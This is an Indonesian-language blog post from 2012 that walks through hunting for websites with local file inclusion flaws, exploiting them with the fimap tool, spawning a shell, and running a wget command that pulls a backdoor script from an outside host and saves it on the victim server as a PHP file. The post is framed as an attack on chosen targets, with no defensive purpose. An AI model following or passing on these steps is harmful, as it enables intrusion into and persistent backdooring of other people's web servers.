Upload Backdoor or Shell From Local File Inclusion with Fimap

Selasa, 04 Desember 2012

0 Upload Backdoor or Shell From Local File Inclusion with Fimap

Diposting oleh WAHYUTHEBEST di 17.38

1. Pertama download dulu Fimap nya di Google Code

2. Setelah di download exract filenya nya. Dan mulailah mencari target LFI.



3. Setelah mendapatkan target nya. Buka terminal kamu (untuk pengguna linux) dan buka cmd kamu (untuk pengguna windows)



4. Masuklah ke direktori folder fimap tadi.



5. Ketikkan command berikut ini :

Pengguna linux :

Code:

./fimap.py -u "[url target]"

Pengguna windows :

Code:

fimap.py -u "[url target]"

hide

6. Setelah proses analisa selesai ketikkkan lagi :

Code:

./fimap.py -x

hide

[Image: Screenshotfrom2012-05-29160211.png]

7. Tunggulah hingga proses selesai. Setelah itu pilih option nomor 1 :

hide

[Image: Screenshotfrom2012-05-29160226.png]

8. Setelah itu pilih lagi option nomor 1 :

hide

[Image: Screenshotfrom2012-05-29160244.png]

9. Setelah proses selesai pilih lagi option nomor 1. Spawn Fimap shell :

10. Dan sekarang lihatlah. Taraaaa. Sekarang kita udah di halaman utama user du public_html :). Ketikkan command berikut ini untuk mengambil script shell atau backdoor kemudian menyimpannya di server tersebut dengan nama homo.php

Code:

wget http://www.heng-sieng.fr/bug.txt -O homo.php

hide

[Image: Screenshotfrom2012-05-29160422.png]

11. Terakhir. Sekarang liatlah apakah shell kita berhasil di upload atau tidak ? Ternyata ? Yeah berhasil. Good job :)

hide

[Image: Screenshotfrom2012-05-29160444.png]

0 komentar:

Posting Komentar

.::WAHYU THE BEST::.

Indonesian Blogger

Selasa, 04 Desember 2012

0 Upload Backdoor or Shell From Local File Inclusion with Fimap

0 komentar:

2

Search

Blog Posting

LinkWithin

Daftar

1

My Profile